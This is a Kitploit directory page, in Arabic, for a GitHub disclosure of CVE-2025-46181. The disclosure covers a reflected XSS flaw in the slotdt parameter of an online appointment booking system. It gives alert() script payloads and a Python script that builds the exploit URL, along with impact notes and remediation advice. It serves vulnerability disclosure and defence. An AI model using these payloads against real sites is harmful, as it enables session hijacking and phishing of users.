Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-46181-XSS — إفصاح عن ثغرة XSS المنعكسة مع نص PoC وإرشادات المعالجة لنظام حجز مواعيد عبر الإنترنت. يتضمن تحليل المعلمة الضعيفة وتقييم الأثر. | Kitploit
أدوات/GitHubGitHub/shemkumar/cve-2025-46181-xss
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubshemkumar/cve-2025-46181-xss

CVE-2025-46181-XSS

إفصاح عن ثغرة XSS المنعكسة مع نص PoC وإرشادات المعالجة لنظام حجز مواعيد عبر الإنترنت. يتضمن تحليل المعلمة الضعيفة وتقييم الأثر.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-46181 - ثغرة XSS المنعكسة في نظام حجز المواعيد عبر الإنترنت

معرّف CVE: CVE-2025-46181
اكتشفها: Shemkumar P (shemkumar.github.io)
نوع الثغرة: البرمجة النصية عبر المواقع المنعكسة (Reflected XSS)
الخطورة: متوسطة
الحالة: مُفصح عنها، تم تخصيص CVE من قبل MITRE


✨ الوصف

توجد ثغرة البرمجة النصية عبر المواقع المنعكسة (Reflected XSS) في نظام عام لحجز المواعيد عبر الإنترنت (الإصدار 1.0)، وتحديدًا في الصفحة التي تتعامل مع تأكيد الموعد. يفشل معامل GET في تعقيم المُدخلات بشكل صحيح، مما يتيح حقن JavaScript وتنفيذ أكواد في متصفح الضحية.


📍 المعامل القابل للاستغلال

root@kitploit:~
GET /confirmapp.php?slotdt=<payload>

مثال على الحمولة (مشفّرة):

root@kitploit:~
<script>alert("XSS")</script>

💥 إثبات المفهوم (PoC)

root@kitploit:~
<script>alert("You have been hijacked")</script>

🚫 تم حجب الرابط المباشر لأسباب أخلاقية. تم اختبار هذه الثغرة في بيئة خاضعة للتحكم.


⚙️ سكربت الإثبات بلغة Python

root@kitploit:~
import requests
from urllib.parse import quote

base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'

params = {
    'fullname': 'test',
    'mobile': '9999999999',
    'emailid': '[email protected]',
    'slotdt': payload,
    'slottime': '11:00:00',
    'doctorid': '2'
}

encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")

🛡️ الأثر

  • تنفيذ أكواد JavaScript عشوائية
  • احتمال اختطاف الجلسة
  • إعادة توجيه عبر Clickjacking أو التصيّد الاحتيالي
  • هجمات موجهة عبر روابط مصممة خصيصًا

🧪 المعالجة

يجب على التطبيق:

  • استخدام htmlspecialchars() لترميز مدخلات المستخدم في PHP
  • استخدام سياسة أمان المحتوى (CSP)
  • تعقيم بيانات المستخدم على جانبي العميل والخادم

📜 الجدول الزمني

  • الاكتشاف: مايو 2025
  • تخصيص CVE من قبل MITRE: يونيو 2025
  • الإصدار العام: يونيو 2025

🧑‍💻 المؤلف

Shemkumar P
🕸️ shemkumar.github.io
🔐 باحث في الأمن السيبراني | مهتم بمسابقات CTF | مُبلغ عن ثغرات CVE


⚠️ هذا المنشور مخصص للاستخدام التعليمي والدفاعي فقط. اختبار أو استغلال الثغرات على أنظمة لا تملكها أو ليس لديك إذن صريح لاستخدامها يعد غير قانوني وغير أخلاقي.

تنزيل الأداة